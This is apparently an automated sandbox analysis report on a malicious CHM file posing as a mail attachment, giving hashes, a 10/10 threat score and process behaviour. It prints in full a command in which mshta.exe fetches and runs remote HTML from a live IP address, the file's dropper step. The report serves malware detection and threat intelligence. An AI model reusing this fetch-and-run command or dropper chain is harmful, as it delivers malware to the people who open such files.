b16ebaec337178a9f4c661d84a9998e453f4b693eab3e3fbc9bb6b957661f3c6

Analysis

max time kernel
135s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
21-03-2023 23:32

Target

MAIL_20230125151802.chm
Size

10KB
MD5

45bd3001517f5e913ddde83827f4cc29
SHA1

710a7d78c4bbca17d6cefce8c392e7d358c37a8d
SHA256

c80fbab8c27cb9be91885a470377088d6639b95b85dfe5ae3c346e537b143a87
SHA512

c2dcf7d3d6e1353fe6259e326517c07c2e168bc83c0847c293d15d2a0fcc0bbec31506de2347b45a6455465d88a27bde68179352c4473a8eac7ce63b3581bb75
SSDEEP

48:U5yGg202QRlEFlErlElZO5sD7GH6N6xWX3VGJtihAxkNzY94ApKSE7HWVMjUBxBD:U5y6khHq6UMl94A0AMjUBxBjR7UyEf0

Score

10^/10

Language

hta

Source

URLs

hta.dropper

http://141.105.65.165/data/3.html

Blocklisted process makes network request 1 IoCs

Processes:

mshta.exe

flow pid process

20 4424 mshta.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

hh.exe

pid process

4656 hh.exe
4656 hh.exe
Suspicious use of WriteProcessMemory 2 IoCs

Processes:

hh.exe

description pid process target process

PID 4656 wrote to memory of 4424 4656 hh.exe mshta.exe
PID 4656 wrote to memory of 4424 4656 hh.exe mshta.exe

flow	pid	process
20	4424	mshta.exe

pid	process
4656	hh.exe
4656	hh.exe

description	pid	process	target process
PID 4656 wrote to memory of 4424	4656	hh.exe	mshta.exe
PID 4656 wrote to memory of 4424	4656	hh.exe	mshta.exe

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://141.105.65.165/data/3.html ,
2⤵
- Blocklisted process makes network request
PID:4424